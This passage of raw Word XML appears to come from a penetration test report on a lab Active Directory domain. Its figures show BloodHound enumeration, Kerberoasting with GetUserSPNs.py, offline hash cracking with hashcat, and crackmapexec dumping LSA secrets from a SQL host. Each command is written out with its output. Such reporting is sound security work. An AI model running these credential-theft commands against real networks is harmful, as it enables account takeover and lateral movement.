                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>INFO: Found 1 domains</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5401ADCD" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>INFO: Found 1 domains in the forest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F757BDF" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>INFO: Found 503 computers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="391DF127" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>INFO: Connecting to LDAP server: DC01.INLANEFREIGHT.LOCAL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CB94886" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>INFO: Found 652 users</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B2010F9" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="32BE132F" w14:textId="1C87A500" w:rsidR="00A40765" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;SNIP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D85EE6C" w14:textId="6228DC04" w:rsidR="00CF7345" w:rsidRDefault="00A40765" w:rsidP="00A40765">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Running BloodHound Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1923A471" w14:textId="39A53510" w:rsidR="00881DF1" w:rsidRDefault="003D5536">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003D5536">
        <w:t>The tester used this tool to check privileges for each of the SPN accounts enumerated earlier and noticed that only the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>mssqlsvc</w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:t> account had any privileges beyond a standard domain user. This account had local administrator access over the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>SQL01</w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:t> host. SQL servers are often high value targets in a domain as they hold privileged credentials, sensitive data, or may even have a more privileged user logged in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F0218B" w14:textId="77777777" w:rsidR="00A40765" w:rsidRDefault="003D5536" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="ImageFormat"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76AEE6D8" wp14:editId="0436EAB2">
            <wp:extent cx="6858000" cy="1694180"/>
            <wp:effectExtent l="57150" t="114300" r="114300" b="584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h_mssqlsvc.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1694180"/>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6E8466AC" w14:textId="40E49609" w:rsidR="003D5536" w:rsidRDefault="00A40765" w:rsidP="00A40765">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Confirming Local Admin Rights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6863D270" w14:textId="24735757" w:rsidR="003D5536" w:rsidRDefault="003D5536">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003D5536">
        <w:t>The tester then performed a targeted Kerberoasting attack to retrieve the Kerberos TGS ticket for the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>mssqlsvc</w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:t> service account.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10800"/>
      </w:tblGrid>
      <w:tr w:rsidR="00881DF1" w14:paraId="3C17D381" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2795B11E" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="00881DF1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:r w:rsidR="003D5536" w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>GetUserSPNs.py INLANEFREIGHT.LOCAL/bsmith -dc-ip 192.168.195.204 -request-user mssqlsvc</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34B88A8A" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="26A7A447" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Impacket v0.9.24.dev1+20210922.102044.c7bc76f8 - Copyright 2021 SecureAuth Corporation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="085610F6" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="68D566AF" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Password:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DD1460D" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">ServicePrincipalName                     Name      MemberOf  PasswordLastSet             LastLogon  Delegation </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="407951F1" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>---------------------------------------  --------  --------  --------------------------  ---------  ----------</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09494FA3" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">MSSQLSvc/SQL01.inlanefreight.local:1433  mssqlsvc            2022-05-13 16:52:07.280623  &lt;never&gt;               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C80E5D2" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57FD9FAD" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5EF019BA" w14:textId="1AD1A8F9" w:rsidR="00A40765" w:rsidRPr="00A40765" w:rsidRDefault="003D5536" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>krb5tgs$23$*mssqlsvc$INLANEFREIGHT.LOCAL$INLANEFREIGHT.LOCAL/mssqlsvc*$2c43cf68f965432014279555d1984740$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</w:t>
            </w:r>
            <w:r w:rsidR="00A40765">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>b7e571c40ccb9c295c8cf18e &lt;SNIP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="160738CF" w14:textId="7CD2EF7C" w:rsidR="00CF7345" w:rsidRDefault="00A40765" w:rsidP="00A40765">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:color w:val="9FEF00"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A53620">
        <w:t>Kerberoasting with GetUserSPNs.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D16D1E" w14:textId="64F3ADD9" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003D5536">
        <w:t xml:space="preserve">The tester was able to successfully "crack" this password offline to reveal its </w:t>
      </w:r>
      <w:r w:rsidR="00A40765" w:rsidRPr="003D5536">
        <w:t>clear text</w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:t xml:space="preserve"> value.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10800"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CF7345" w14:paraId="384B67B0" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B771825" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="00CF7345" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:r w:rsidR="003D5536" w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">$hashcat -m 13100 mssqlsvc_tgs /usr/share/wordlists/rockyou.txt </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22E6442C" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="76D201DB" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="00A40765" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A40765">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>hashcat (v6.1.1) starting...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="719E1F66" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="00A40765" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5A277B2C" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="00A40765" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A40765">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;SNIP&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37AD2F36" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="20109C5D" w14:textId="784C263B" w:rsidR="00A40765" w:rsidRPr="00A40765" w:rsidRDefault="003D5536" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>krb5tgs$23$*mssqlsvc$INLANEFREIGHT.LOCAL$INLANEFREIGHT.LOCAL/mssqlsvc*$2c43cf68f965432014279555d1984740$5a&lt;SNIP&gt;:</w:t>
            </w:r>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;REDACTED&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FD5A4DA" w14:textId="37F3A8BB" w:rsidR="00CF7345" w:rsidRDefault="00A40765" w:rsidP="00A40765">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:color w:val="9FEF00"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Cracking TGS Ticket</w:t>
      </w:r>
      <w:r w:rsidR="002C1820">
        <w:t xml:space="preserve"> with Hashcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000711C" w14:textId="1C26CCD6" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003D5536">
        <w:t>This password could be used to access the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>SQL01</w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:t xml:space="preserve"> host remotely and retrieve a set of </w:t>
      </w:r>
      <w:r w:rsidR="00A40765" w:rsidRPr="003D5536">
        <w:t>clear text</w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:t xml:space="preserve"> credentials from the registry for the</w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t> srvadmin</w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:t> account.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CF7345" w14:paraId="667A8C44" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4582B4DF" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="00CF7345" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:r w:rsidR="003D5536" w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>crackmapexec smb 192.168.195.220 -u mssqlsvc -p &lt;REDACTED&gt; --lsa</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4261B85C" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="39EA8A19" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>SMB         192.168.195.220 445    SQL01            [*] Windows 10.0 Build 17763 (name:SQL01) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75C0B167" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SMB         192.168.195.220 445    SQL01            [+] INLANEFREIGHT.LOCAL\mssqlsvc:&lt;REDACTED&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C62B1D4" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>SMB         192.168.195.220 445    SQL01            [+] Dumping LSA secrets</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="714D0421" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>SMB         192.168.195.220 445    SQL01            INLANEFREIGHT.LOCAL/Administrator:</w:t>
            </w:r>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>DCC2$10240#Administrator#7bd0f186CCCCC450c5e8cb53228cc0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32A45868" w14:textId="77777777" w:rsidR="003D5536" w:rsidRPr="003D5536" w:rsidRDefault="003D5536" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5536">
              <w:rPr>
